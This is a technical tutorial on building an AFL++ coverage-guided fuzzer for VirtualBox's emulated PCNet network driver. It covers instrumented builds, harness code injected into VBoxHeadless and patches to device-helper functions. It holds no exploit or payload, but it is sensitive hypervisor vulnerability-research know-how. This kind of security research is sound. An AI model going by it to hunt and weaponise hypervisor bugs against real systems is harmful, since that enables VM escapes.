This article introduces VirtualBox research and explains how to build a coverage-based fuzzer, focusing on the emulated network device drivers. In the examples below, we explain how to create a harness for the non-default network device driver PCNet. The example can be readily adjusted for a different network driver or even different device driver components.
We are aware that there are excellent resources related to this topic - see [1], [2]. However, these cover the fuzzing process from a high-level perspective or omit some important technical details. Our goal is to present all the necessary steps and code required to instrument and debug the latest stable version of VirtualBox (6.1.30 at the time of writing). As the SVN version is out-of-sync, we download the tarball instead.
In our setup, we use Ubuntu 20.04.3 LTS. As VT-x/AMD-V is not fully supported when VirtualBox runs inside another virtual machine, we use a native host. If you are using a MacBook, the following guide explains how to install Linux on an external SSD.
VirtualBox uses the kBuild framework for building. As mentioned on their page, only a few (0.5) people on our planet understand it, but editing makefiles should be straightforward. As we will see later, after commenting out hardware-specific components, that’s indeed true.
kmk is kBuild’s counterpart to make. Depending on the supplied arguments, it creates debug or release builds. The debug build provides a robust logging mechanism, which we describe next.
Note that in this article we use three different builds: the debug build, plus two release builds for fuzzing and coverage reporting. Because the release builds involve modifying the source code, we use a separate directory for each instance.
The build instructions for Linux are described here. After installing all required dependencies, it’s enough to run the following commands:
$ ./configure --disable-hardening --disable-docs
$ source ./env.sh && kmk KBUILD_TYPE=debug
If successful, the VirtualBox binary is created at out/linux.amd64/debug/bin/VirtualBox. Before creating our first guest machine, we have to compile and load the kernel modules:
$ VERSION=6.1.30
$ vbox_dir=~/VirtualBox-$VERSION-debug/
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxdrv && sudo make && sudo insmod vboxdrv.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetflt && sudo make && sudo insmod vboxnetflt.ko)
$ (cd $vbox_dir/out/linux.amd64/debug/bin/src/vboxnetadp && sudo make && sudo insmod vboxnetadp.ko)
VirtualBox defines the VBOXLOGGROUP enum inside include/VBox/log.h, allowing us to selectively enable logging for specific files or functionalities. Unfortunately, since logging is intended for debug builds, we could not enable it in the release build without many cumbersome changes.
Unlike the VirtualBox binary, the VBoxHeadless startup utility located in the same directory allows running the machines directly from the command-line interface. For illustration, we want to enable debugging for both this component and the PCNet network driver. First, we have to identify the relevant entries of the VBOXLOGGROUP enum. They are defined using the LOG_GROUP_ string near the beginning of the file we wish to trace:
$ grep LOG_GROUP_ src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp src/VBox/Devices/Network/DevPCNet.cpp
src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp:#define LOG_GROUP LOG_GROUP_GUI
src/VBox/Devices/Network/DevPCNet.cpp:#define LOG_GROUP LOG_GROUP_DEV_PCNET
We redirect the output to the terminal instead of creating log files and specify the Log Group name, using the lowercased string from the grep output and without the prefix:
$ export VBOX_LOG_DEST="nofile stdout"
$ VBOX_LOG="+gui.e.l.f+dev_pcnet.e.l.f.l2" out/linux.amd64/debug/bin/VBoxHeadless -startvm vm-test
The VirtualBox logging facility and the meaning of all parameters are clarified here. The output is easy to grep, and it’s crucial for understanding the internal structures.
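The mapping from a LOG_GROUP_ define to a VBOX_LOG entry is mechanical: drop the prefix, lowercase the rest, and append the flags. The C++ sketch below only spells out that rule; the helper names are hypothetical and not part of VirtualBox, and the flag strings are copied from the command above.

```cpp
#include <cctype>
#include <string>
#include <string_view>

// Hypothetical helper: turn a LOG_GROUP_* identifier, as printed by the grep
// above, into the group name VBOX_LOG expects (prefix dropped, lowercased).
std::string logGroupName(std::string_view define) {
    constexpr std::string_view kPrefix = "LOG_GROUP_";
    if (define.substr(0, kPrefix.size()) == kPrefix) {
        define.remove_prefix(kPrefix.size());
    }
    std::string name;
    for (char c : define) {
        name += static_cast<char>(std::tolower(static_cast<unsigned char>(c)));
    }
    return name;
}

// Builds one "+group.flags" entry of a VBOX_LOG value, e.g. "+gui.e.l.f".
std::string vboxLogEntry(std::string_view define, std::string_view flags) {
    std::string entry = "+" + logGroupName(define);
    if (!flags.empty()) {
        entry += '.';
        entry += flags;
    }
    return entry;
}
```

Concatenating vboxLogEntry("LOG_GROUP_GUI", "e.l.f") and vboxLogEntry("LOG_GROUP_DEV_PCNET", "e.l.f.l2") reproduces the VBOX_LOG value used above.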
For Ubuntu, we can follow the official instructions to install the Clang compiler. We used clang-12, because building was not possible with the previous version. Alternatively, clang-13 is supported too. After installation, it is useful to verify it and create symlinks so that AFLplusplus does not complain about missing locations:
$ rehash
$ clang --version
$ clang++ --version
$ llvm-config --version
$ llvm-ar --version
$ sudo ln -sf /usr/bin/llvm-config-12 /usr/bin/llvm-config
$ sudo ln -sf /usr/bin/clang++-12 /usr/bin/clang++
$ sudo ln -sf /usr/bin/clang-12 /usr/bin/clang
$ sudo ln -sf /usr/bin/llvm-ar-12 /usr/bin/llvm-ar
Our fuzzer of choice was AFL++, although everything can be trivially reproduced with libFuzzer too. Since we don’t need the black-box instrumentation, it’s enough to build the source-only parts:
$ git clone https://github.com/AFLplusplus/AFLplusplus
$ cd AFLplusplus
# use this revision if the VirtualBox compilation fails
$ git checkout 66ca8618ea3ae1506c96a38ef41b5f04387ab560
$ make source-only
$ sudo make install
To use clang for fuzzing, it’s necessary to create a new template, kBuild/tools/AFL.kmk, by using the vbox-fuzz/AFL.kmk file available at https://github.com/doyensec/vbox-fuzz.
Moreover, we have to fix multiple issues related to undefined symbols or different comment styles. The most important change is disabling the instrumentation for Ring-0 components (TEMPLATE_VBoxR0_TOOL); otherwise, it’s not possible to boot the guest machine. All these changes are included in the patch files.
Interestingly, while investigating the error message from the failed compilation, I found some recent slides from the HITB conference describing exactly the same issue. This confirmed that I was on the right track and that other people were trying the same approach. The slides also mention VBoxHeadless, which was a natural choice for a harness and the one we used too.
If the unmodified VirtualBox is located inside the ~/VirtualBox-6.1.30-release-afl directory, we run these commands to apply all necessary patches:
$ TO_PATCH=6.1.30
$ SRC_PATCH=6.1.30
$ cd ~/VirtualBox-$TO_PATCH-release-afl
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/Config.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/undefined_xfree86.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/DevVGA-SVGA3d-glLdr.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/VBoxDTraceLibCWrappers.patch
$ patch -p1 < ~/vbox-fuzz/$SRC_PATCH/os_Linux_x86_64.patch
Running kmk without KBUILD_TYPE yields instrumented binaries, where the device drivers are bundled inside the VBoxDD.so shared object. The output from nm confirms the presence of the instrumentation symbols:
$ nm out/linux.amd64/release/bin/VBoxDD.so | egrep "afl|sancov"
U __afl_area_ptr
U __afl_coverage_discard
U __afl_coverage_off
U __afl_coverage_on
U __afl_coverage_skip
000000000033e124 d __afl_selective_coverage
0000000000028030 t sancov.module_ctor_trace_pc_guard
000000000033f5a0 d __start___sancov_guards
000000000036f158 d __stop___sancov_guards
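In this nm listing, lowercase types (d, t) are local symbols defined in VBoxDD.so itself, while U marks references the library does not define and that must be resolved at load time, presumably from the AFL++ runtime linked into the instrumented executable. As a hedged illustration of checking this output programmatically, for example in a build script, the following sketch parses nm lines; the struct and function names are made up for this example.

```cpp
#include <optional>
#include <sstream>
#include <string>
#include <vector>

// One parsed line of nm output: "<address> <type> <name>" or, for undefined
// symbols, just "<type> <name>" (nm leaves the address column blank).
struct NmSymbol {
    std::string address;  // empty for undefined symbols
    char type = '?';      // 'U' = undefined, 't'/'T' = text, 'd'/'D' = data
    std::string name;
};

std::optional<NmSymbol> parseNmLine(const std::string& line) {
    std::istringstream in(line);
    std::vector<std::string> fields;
    for (std::string f; in >> f;) fields.push_back(f);

    NmSymbol sym;
    if (fields.size() == 3) {
        sym.address = fields[0];
        fields.erase(fields.begin());
    } else if (fields.size() != 2) {
        return std::nullopt;
    }
    if (fields[0].size() != 1) return std::nullopt;
    sym.type = fields[0][0];
    sym.name = fields[1];
    return sym;
}

// True if `name` appears as an undefined ('U') reference, i.e. the library
// expects another object to provide the symbol at load time.
bool hasUndefinedRef(const std::vector<std::string>& lines, const std::string& name) {
    for (const auto& l : lines) {
        auto s = parseNmLine(l);
        if (s && s->type == 'U' && s->name == name) return true;
    }
    return false;
}
```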
First, we have to apply the patches for AFL, described in the previous section. After that, we copy the instrumented version and remove the earlier compiled binaries if they are present:
$ VERSION=6.1.30
$ cp -r ~/VirtualBox-$VERSION-release-afl ~/VirtualBox-$VERSION-release-afl-gcov
$ cd ~/VirtualBox-$VERSION-release-afl-gcov
$ rm -rf out
Now we have to edit the kBuild/tools/AFL.kmk template to append the -fprofile-instr-generate -fcoverage-mapping switches as follows:
TOOL_AFL_CC ?= afl-clang-fast$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_CXX ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_AS ?= afl-clang-fast$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
TOOL_AFL_LD ?= afl-clang-fast++$(HOSTSUFF_EXE) -m64 -fprofile-instr-generate -fcoverage-mapping
To avoid duplication, we share the src and include folders with the fuzzing build:
$ rm -rf ./src
$ rm -rf ./include
$ ln -s ../VirtualBox-$VERSION-release-afl/src $PWD/src
$ ln -s ../VirtualBox-$VERSION-release-afl/include $PWD/include
Lastly, we expand the list of undefined symbols inside src/VBox/Additions/x11/undefined_xfree86 by adding:
ftell
uname
strerror
mkdir
__cxa_atexit
fclose
fileno
fdopen
strrchr
fseek
fopen
ftello
prctl
strtol
getpid
mmap
getpagesize
strdup
Furthermore, because this build is intended for reporting only, we disable all unnecessary features:
$ ./configure --disable-hardening --disable-docs --disable-java --disable-qt
$ source ./env.sh && kmk
The raw profile is generated by setting LLVM_PROFILE_FILE. For more information, the Clang documentation provides the necessary details.
At this point, the VirtualBox drivers are fully instrumented, and the only thing left before we start fuzzing is a harness. The PCNet device driver is defined in src/VBox/Devices/Network/DevPCNet.cpp, and it exports several functions. Our output is truncated to include only the R3 (ring-3) components, as these are the ones we are targeting:
/**
* The device registration structure.
*/
const PDMDEVREG g_DevicePCNet =
{
/* .u32Version = */ PDM_DEVREG_VERSION,
/* .uReserved0 = */ 0,
/* .szName = */ "pcnet",
#ifdef PCNET_GC_ENABLED
/* .fFlags = */ PDM_DEVREG_FLAGS_DEFAULT_BITS | PDM_DEVREG_FLAGS_RZ | PDM_DEVREG_FLAGS_NEW_STYLE,
#else
/* .fFlags = */ PDM_DEVREG_FLAGS_DEFAULT_BITS,
#endif
/* .fClass = */ PDM_DEVREG_CLASS_NETWORK,
/* .cMaxInstances = */ ~0U,
/* .uSharedVersion = */ 42,
/* .cbInstanceShared = */ sizeof(PCNETSTATE),
/* .cbInstanceCC = */ sizeof(PCNETSTATECC),
/* .cbInstanceRC = */ sizeof(PCNETSTATERC),
/* .cMaxPciDevices = */ 1,
/* .cMaxMsixVectors = */ 0,
/* .pszDescription = */ "AMD PCnet Ethernet controller.\n",
#if defined(IN_RING3)
/* .pszRCMod = */ "VBoxDDRC.rc",
/* .pszR0Mod = */ "VBoxDDR0.r0",
/* .pfnConstruct = */ pcnetR3Construct,
/* .pfnDestruct = */ pcnetR3Destruct,
/* .pfnRelocate = */ pcnetR3Relocate,
/* .pfnMemSetup = */ NULL,
/* .pfnPowerOn = */ NULL,
/* .pfnReset = */ pcnetR3Reset,
/* .pfnSuspend = */ pcnetR3Suspend,
/* .pfnResume = */ NULL,
/* .pfnAttach = */ pcnetR3Attach,
/* .pfnDetach = */ pcnetR3Detach,
/* .pfnQueryInterface = */ NULL,
/* .pfnInitComplete = */ NULL,
/* .pfnPowerOff = */ pcnetR3PowerOff,
/* .pfnSoftReset = */ NULL,
/* .pfnReserved0 = */ NULL,
/* .pfnReserved1 = */ NULL,
/* .pfnReserved2 = */ NULL,
/* .pfnReserved3 = */ NULL,
/* .pfnReserved4 = */ NULL,
/* .pfnReserved5 = */ NULL,
/* .pfnReserved6 = */ NULL,
/* .pfnReserved7 = */ NULL,
#elif defined(IN_RING0)
// [ SNIP ]
The most interesting fields are .pfnReset, which resets the driver’s state, and the .pfnReserved functions. The latter are currently unused, but we can add our own functions and call them by modifying the PDM (Pluggable Device Manager) header files. PDM is an abstract interface used to add new virtual devices relatively easily.
But first, if we want to use a modified VBoxHeadless, which provides a high-level interface (VirtualBox Main API) to the VirtualBox functionality, we need to find a way to access the pdm structure.
By reading the source code, we can see multiple patterns where pVM (pointer to a VM handle) is dereferenced to traverse a linked list of all device instances:
// src/VBox/VMM/VMMR3/PDMDevice.cpp
for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3)
{
// [ SNIP ]
}
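To make the traversal pattern concrete outside the VirtualBox tree, here is a self-contained sketch with heavily simplified, hypothetical stand-ins for PDMDEVREG and PDMDEVINS (in the real structure the next pointer lives in pDevIns->Internal.s.pNextR3). It performs the same name lookup the harness later uses to find the pcnet instance.

```cpp
#include <cstring>

// Hypothetical, heavily simplified stand-ins for PDMDEVREG and PDMDEVINS.
struct MockDevReg {
    char szName[32];
};

struct MockDevIns {
    const MockDevReg* pReg;
    MockDevIns* pNextR3;  // singly linked list of all device instances
};

// Walks the instance list like the loop in PDMDevice.cpp and returns the first
// instance whose registration name matches, or nullptr if there is none.
MockDevIns* findDevice(MockDevIns* pHead, const char* pszName) {
    for (MockDevIns* pDevIns = pHead; pDevIns; pDevIns = pDevIns->pNextR3) {
        if (!std::strcmp(pDevIns->pReg->szName, pszName)) {
            return pDevIns;
        }
    }
    return nullptr;
}
```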
The VirtualBox Main API on non-Windows platforms uses Mozilla XPCOM, so we wanted to find out whether we could leverage it to access the low-level structures. After some digging, we found that it is indeed possible to retrieve the VM handle via the IMachineDebugger class. The following snippet demonstrates how to access pVM:
LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;
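The getter hands the user-mode VM handle back as a LONG64, so the harness turns the integer back into a pointer through intptr_t. A minimal sketch of that round trip follows, using hypothetical MockUVM/MockVM types in place of the real UVM and VM structures. The pointer is only meaningful inside the process that hosts the VM, which should hold for VBoxHeadless since it runs the VM itself.

```cpp
#include <cstdint>

// Hypothetical stand-ins; the real structures are in include/VBox/vmm/uvm.h and vm.h.
struct MockVM { int marker; };
struct MockUVM { MockVM* pVM; };

using LONG64 = std::int64_t;

static_assert(sizeof(void*) <= sizeof(LONG64), "pointer must fit in LONG64");

// Models an interface getter that can only return integers: the pointer is
// widened to a 64-bit integer on the way out...
LONG64 getVmAsInteger(MockUVM* pUVM) {
    return static_cast<LONG64>(reinterpret_cast<std::intptr_t>(pUVM));
}

// ...and narrowed back through intptr_t on the way in, as in the snippet above.
MockVM* vmFromInteger(LONG64 llVM) {
    MockUVM* pUVM = reinterpret_cast<MockUVM*>(static_cast<std::intptr_t>(llVM));
    return pUVM ? pUVM->pVM : nullptr;
}
```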
After obtaining the pointer to the VM, we have to change the build scripts again, allowing VBoxHeadless to access internal PDM definitions from VBoxHeadless.cpp.
We tried to minimize the amount of changes and after some experimentation, we came up with the following steps:
1) Create a new file called src/VBox/Frontends/Common/harness.h with this content:
/* without this, include/VBox/vmm/pdmtask.h does not import PDMTASKTYPE enum */
#define VBOX_IN_VMM 1
#include "PDMInternal.h"
/* needed by machineDebugger COM VM getter */
#include <VBox/vmm/vm.h>
#include <VBox/vmm/uvm.h>
/* needed by AFL */
#include <unistd.h>
2) Modify the src/VBox/Frontends/VBoxHeadless/VBoxHeadless.cpp file by adding the following code just before the event loop starts, near the end of the file:
LogRel(("VBoxHeadless: failed to start windows message monitor: %Rrc\n", irc));
#endif /* RT_OS_WINDOWS */
/* --------------- BEGIN --------------- */
LONG64 llVM;
HRESULT hrc = machineDebugger->COMGETTER(VM)(&llVM);
if (SUCCEEDED(hrc)) {
PUVM pUVM = (PUVM)(intptr_t)llVM; /* The user mode VM handle */
PVM pVM = pUVM->pVM;
for (PPDMDEVINS pDevIns = pVM->pdm.s.pDevInstances; pDevIns; pDevIns = pDevIns->Internal.s.pNextR3) {
if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
unsigned char *buf = __AFL_FUZZ_TESTCASE_BUF;
while (__AFL_LOOP(10000))
{
int len = __AFL_FUZZ_TESTCASE_LEN;
pDevIns->pReg->pfnAFL(pDevIns, buf, len);
}
}
}
}
exit(0);
/* --------------- END --------------- */
/*
* Pump vbox events forever
*/
LogRel(("VBoxHeadless: starting event loop\n"));
for (;;)
3) In the same file, after the #include "PasswordInput.h" directive, add:
#include "harness.h"
Finally, add __AFL_FUZZ_INIT(); before the definition of the TrustedMain function:
__AFL_FUZZ_INIT();
/**
* Entry point.
*/
extern "C" DECLEXPORT(int) TrustedMain(int argc, char **argv, char **envp)
4) Edit src/VBox/Frontends/VBoxHeadless/Makefile.kmk and change VBoxHeadless_DEFS and VBoxHeadless_INCS from
VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,)
VBoxHeadless_INCS = \
$(VBOX_GRAPHICS_INCS) \
../Common
to
VBoxHeadless_TEMPLATE := $(if $(VBOX_WITH_HARDENING),VBOXMAINCLIENTDLL,VBOXMAINCLIENTEXE)
VBoxHeadless_DEFS += $(if $(VBOX_WITH_RECORDING),VBOX_WITH_RECORDING,) $(VMM_COMMON_DEFS)
VBoxHeadless_INCS = \
$(VBOX_GRAPHICS_INCS) \
../Common \
../../VMM/include
For the network drivers, user-controlled data can be supplied in various ways: through I/O port or MMIO accesses, or through guest memory that the emulated device reads via PDMDevHlpPhysRead. If this part is unclear, please refer back to [1] in the references, which is probably the best available resource explaining the attack surface. Moreover, many ports or values are restricted to a specific set, and to save time, we want to use only these values. Therefore, while designing our fuzzing framework, we settled on the Fuzzed Data Provider (hereafter FDP).
FDP is part of LLVM. Given a buffer generated by AFL, it can turn it into numbers, bytes, or enums restricted to a given range or set. We can store the pointer to FDP inside the device driver instance and retrieve it any time we want to feed some data.
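To show what "restricted" means in practice, the sketch below is a stripped-down stand-in for LLVM’s FuzzedDataProvider, modeled on its published header: integers are pulled from the end of the input and reduced modulo the requested range, raw data is taken from the front, and an exhausted input yields the range minimum. It is an illustration under those assumptions, not a replacement; the real header has many more methods and extra checks (for example, it aborts if min > max).

```cpp
#include <array>
#include <climits>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <limits>
#include <type_traits>

// Illustrative miniature of FuzzedDataProvider; use <fuzzer/FuzzedDataProvider.h> in practice.
class MiniFDP {
public:
    MiniFDP(const std::uint8_t* data, std::size_t size) : data_(data), remaining_(size) {}

    std::size_t remaining_bytes() const { return remaining_; }

    template <typename T>
    T ConsumeIntegralInRange(T min, T max) {
        static_assert(std::is_integral<T>::value, "integral type required");
        std::uint64_t range = static_cast<std::uint64_t>(max) - static_cast<std::uint64_t>(min);
        std::uint64_t result = 0;
        std::size_t offset = 0;
        // Pull one byte at a time off the END of the buffer until the range is covered.
        while (offset < sizeof(T) * CHAR_BIT && (range >> offset) > 0 && remaining_ != 0) {
            --remaining_;
            result = (result << CHAR_BIT) | data_[remaining_];
            offset += CHAR_BIT;
        }
        if (range != std::numeric_limits<std::uint64_t>::max()) result %= range + 1;
        return static_cast<T>(static_cast<std::uint64_t>(min) + result);
    }

    template <typename T>
    T ConsumeIntegral() {
        return ConsumeIntegralInRange(std::numeric_limits<T>::min(), std::numeric_limits<T>::max());
    }

    // Picks one element, e.g. an access size from {1, 2, 4}.
    template <typename T, std::size_t N>
    T PickValueInArray(const std::array<T, N>& values) {
        return values[ConsumeIntegralInRange<std::size_t>(0, N - 1)];
    }

    // Copies up to num_bytes from the FRONT of the buffer; returns bytes copied.
    std::size_t ConsumeData(void* dst, std::size_t num_bytes) {
        std::size_t n = num_bytes < remaining_ ? num_bytes : remaining_;
        std::memcpy(dst, data_, n);
        data_ += n;
        remaining_ -= n;
        return n;
    }

private:
    const std::uint8_t* data_;
    std::size_t remaining_;
};
```

Taking integers from the end keeps the "control" bytes (operation choice, port, size) apart from the payload bytes consumed from the front, which is the split the PhysRead patch later relies on.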
Recall that we can use the pfnReserved fields to implement our fuzzing helper functions. For this, it’s enough to edit include/VBox/vmm/pdmdev.h and change the PDMDEVREGR3 structure to match our prototypes:
DECLR3CALLBACKMEMBER(int, pfnAFL, (PPDMDEVINS pDevIns, unsigned char *buf, int len));
DECLR3CALLBACKMEMBER(void *, pfnGetFDP, (PPDMDEVINS pDevIns));
DECLR3CALLBACKMEMBER(int, pfnReserved2, (PPDMDEVINS pDevIns));
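Because PDMDEVREG instances such as g_DevicePCNet are initialized positionally (the /* .pfnReserved0 = */ comments are only labels), repurposing a reserved slot works as long as the structure layout stays the same. The following simplified sketch, with hypothetical RegBefore/RegAfter types, checks that swapping two reserved slots for typed callbacks leaves the size and the offset of the following field unchanged. It relies on all function pointers having the same size, which holds on the usual x86-64 ABIs but is not guaranteed by the C++ standard; every component that includes pdmdev.h still needs to be rebuilt.

```cpp
#include <cstddef>

struct DevIns;  // opaque, stands in for PDMDEVINS

// Simplified "before" layout: reserved slots share one generic signature.
struct RegBefore {
    int (*pfnReset)(DevIns*);
    int (*pfnReserved0)(DevIns*);
    int (*pfnReserved1)(DevIns*);
    int (*pfnReserved2)(DevIns*);
};

// Simplified "after" layout: the first two reserved slots get harness-specific types.
struct RegAfter {
    int (*pfnReset)(DevIns*);
    int (*pfnAFL)(DevIns*, unsigned char*, int);
    void* (*pfnGetFDP)(DevIns*);
    int (*pfnReserved2)(DevIns*);
};

// Changing the signatures must not move any field that follows.
static_assert(sizeof(RegBefore) == sizeof(RegAfter), "size changed");
static_assert(offsetof(RegBefore, pfnReserved2) == offsetof(RegAfter, pfnReserved2),
              "layout changed");
```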
All device drivers have a state, which we can access using the convenient PDMDEVINS_2_DATA macro. Likewise, we can include the FDP header and extend the state structure (in our case PCNETSTATE) with a pointer to the FDP instance:
// src/VBox/Devices/Network/DevPCNet.cpp
#ifdef IN_RING3
# include <iprt/mem.h>
# include <iprt/semaphore.h>
# include <iprt/uuid.h>
# include <fuzzer/FuzzedDataProvider.h> /* Add this */
#endif
// [ SNIP ]
typedef struct PCNETSTATE
{
// [ SNIP ]
#endif /* VBOX_WITH_STATISTICS */
void * fdp; /* Add this */
} PCNETSTATE;
/** Pointer to a shared PCnet state structure. */
typedef PCNETSTATE *PPCNETSTATE;
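The pointer stored in the state is only valid while a test case is being processed, because the provider lives on the harness’s stack. The simplified sketch below, using hypothetical types rather than the real PDM structures, shows that lifetime rule: publish the provider, let other code fetch it through a callback and treat nullptr as "not fuzzing", then clear it before returning.

```cpp
#include <cstddef>

// Hypothetical miniature of the pattern; Provider stands in for FuzzedDataProvider.
struct Provider { std::size_t remaining; };

struct DeviceState {
    void* fdp = nullptr;  // non-null only while a test case is running
};

struct DeviceInstance {
    DeviceState state;                    // stands in for PDMDEVINS_2_DATA(pDevIns, ...)
    void* (*pfnGetFDP)(DeviceInstance*);  // stands in for the repurposed reserved slot
};

void* getFdp(DeviceInstance* dev) { return dev->state.fdp; }

// Consumer side (think pdmR3DevHlp_PhysRead): uses fuzz data only when a
// provider is published and still has bytes left.
bool consumerUsesFuzzData(DeviceInstance* dev) {
    auto* p = static_cast<Provider*>(dev->pfnGetFDP(dev));
    return p != nullptr && p->remaining > 0;
}

// Producer side (think pcnetR3_AFL): publish a stack-allocated provider for the
// duration of one iteration, then clear the pointer so it never dangles.
bool runOneIteration(DeviceInstance* dev, std::size_t len) {
    Provider provider{len};
    dev->state.fdp = &provider;
    bool used = consumerUsesFuzzData(dev);
    dev->state.fdp = nullptr;
    return used;
}
```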
To reflect these changes, the g_DevicePCNet structure has to be updated too:
/**
* The device registration structure.
*/
const PDMDEVREG g_DevicePCNet =
{
// [[ SNIP ]]
/* .pfnConstruct = */ pcnetR3Construct,
// [[ SNIP ]]
/* .pfnReserved0 = */ pcnetR3_AFL,
/* .pfnReserved1 = */ pcnetR3_GetFDP,
When adding new functions, we must be careful to place them inside the R3-only parts. The easiest way is to find the R3 constructor and add the new code right after it, since that region is already guarded by the IN_RING3 macro for conditional compilation.
An example of the PCNet harness:
static DECLCALLBACK(void *) pcnetR3_GetFDP(PPDMDEVINS pDevIns) {
PPCNETSTATE pThis = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
return pThis->fdp;
}
__AFL_COVERAGE();
static DECLCALLBACK(int) pcnetR3_AFL(PPDMDEVINS pDevIns, unsigned char *buf, int len)
{
if (len > 0x2000) {
__AFL_COVERAGE_SKIP();
return VINF_SUCCESS;
}
static unsigned char buf2[0x2000];
memcpy(buf2, buf, len);
FuzzedDataProvider provider(buf2, len);
PPCNETSTATE pThis = PDMDEVINS_2_DATA(pDevIns, PPCNETSTATE);
pThis->fdp = &provider; // Make it accessible for the other modules
FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
void *pvUser = NULL;
uint32_t u32;
const std::array<int, 3> Array = {1, 2, 4};
uint16_t offPort;
uint16_t cb;
pcnetR3Reset(pDevIns);
__AFL_COVERAGE_DISCARD();
__AFL_COVERAGE_ON();
while (pfdp->remaining_bytes() > 0) {
auto choice = pfdp->ConsumeIntegralInRange(0, 3);
offPort = pfdp->ConsumeIntegral<uint16_t>();
u32 = pfdp->ConsumeIntegral<uint32_t>();
cb = pfdp->PickValueInArray(Array);
switch (choice) {
case 0:
// pcnetIoPortWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTIOPORT offPort, uint32_t u32, unsigned cb)
pcnetIoPortWrite(pDevIns, pvUser, offPort, u32, cb);
break;
case 1:
// pcnetIoPortAPromWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTIOPORT offPort, uint32_t u32, unsigned cb)
pcnetIoPortAPromWrite(pDevIns, pvUser, offPort, u32, cb);
break;
case 2:
// pcnetR3MmioWrite(PPDMDEVINS pDevIns, void *pvUser,
// RTGCPHYS off, void const *pv, unsigned cb)
pcnetR3MmioWrite(pDevIns, pvUser, offPort, &u32, cb);
break;
default:
break;
}
}
__AFL_COVERAGE_OFF();
pThis->fdp = NULL;
return VINF_SUCCESS;
}
As the device driver calls PDMDevHlpPhysRead in multiple places, we decided to patch the wrapper instead of modifying every call site. We can do so by editing src/VBox/VMM/VMMR3/PDMDevHlp.cpp, adding the relevant FDP header, and changing the pdmR3DevHlp_PhysRead method to fuzz only the specific driver.
#include "dtrace/VBoxVMM.h"
#include "PDMInline.h"
#include <fuzzer/FuzzedDataProvider.h> /* Add this */
// [ SNIP ]
/** @interface_method_impl{PDMDEVHLPR3,pfnPhysRead} */
static DECLCALLBACK(int) pdmR3DevHlp_PhysRead(PPDMDEVINS pDevIns, RTGCPHYS GCPhys, void *pvBuf, size_t cbRead)
{
PDMDEV_ASSERT_DEVINS(pDevIns);
PVM pVM = pDevIns->Internal.s.pVMR3;
LogFlow(("pdmR3DevHlp_PhysRead: caller='%s'/%d: GCPhys=%RGp pvBuf=%p cbRead=%#x\n",
pDevIns->pReg->szName, pDevIns->iInstance, GCPhys, pvBuf, cbRead));
/* Change this for the fuzzed driver */
if (!strcmp(pDevIns->pReg->szName, "pcnet")) {
FuzzedDataProvider *pfdp = (FuzzedDataProvider *) pDevIns->pReg->pfnGetFDP(pDevIns);
if (pfdp && pfdp->remaining_bytes() >= cbRead) {
pfdp->ConsumeData(pvBuf, cbRead);
return VINF_SUCCESS;
}
}
// [ SNIP ]
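The patch makes each guest-memory read all-or-nothing: if the provider still holds at least cbRead bytes, the whole buffer comes from the fuzzer; otherwise the original read path runs. A hedged, self-contained model of that decision follows; FuzzBytes and GuestMemory are hypothetical simplifications, not VirtualBox types.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical source of fuzz bytes, consumed from the front.
struct FuzzBytes {
    const std::uint8_t* data;
    std::size_t remaining;
    void consume(void* dst, std::size_t n) {  // caller guarantees remaining >= n
        std::memcpy(dst, data, n);
        data += n;
        remaining -= n;
    }
};

// Hypothetical flat guest memory; no bounds checks in this sketch.
struct GuestMemory {
    std::vector<std::uint8_t> bytes;
    void read(std::uint64_t gcPhys, void* dst, std::size_t n) const {
        std::memcpy(dst, bytes.data() + gcPhys, n);
    }
};

// Returns true if the data came from the fuzzer, false if from guest memory.
bool physRead(FuzzBytes* fdp, const GuestMemory& mem, std::uint64_t gcPhys,
              void* dst, std::size_t cb) {
    if (fdp && fdp->remaining >= cb) {
        fdp->consume(dst, cb);
        return true;
    }
    mem.read(gcPhys, dst, cb);  // fall back to the original read path
    return false;
}
```

Never mixing fuzz and real bytes inside one read keeps each descriptor or packet buffer either fully attacker-controlled or fully unchanged.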
Using out/linux.amd64/release/bin/VBoxNetAdpCtl, we can add our network adapter and start fuzzing in persistent mode. However, even though we can reach more than 10k executions per second, we still have some work to do on stability.
Unfortunately, none of the usual stability-improvement methods worked, as we were not able to use LTO instrumentation. We suspect this is because the device driver module is loaded dynamically, which made it impossible both to partially disable instrumentation and to identify unstable edges. The instability is caused by not properly resetting the driver’s state, and because we are running the whole VM, there are many things under the hood that are not easy to influence, such as internal locks or the VMM.
One of the improvements is already contained in the harness, as we can discard the coverage before we start fuzzing and enable it only for a short fuzzing block.
Additionally, we can disable the instantiation of all devices that we are not currently fuzzing. The relevant code is inside src/VBox/VMM/VMMR3/PDMDevice.cpp, in pdmR3DevInit, which instantiates the devices. For the PCNet driver, at least the pci, VMMDev, and pcnet modules must be enabled, so we can skip the initialization of the rest.
/*
*
* Instantiate the devices.
*
*/
for (i = 0; i < cDevs; i++)
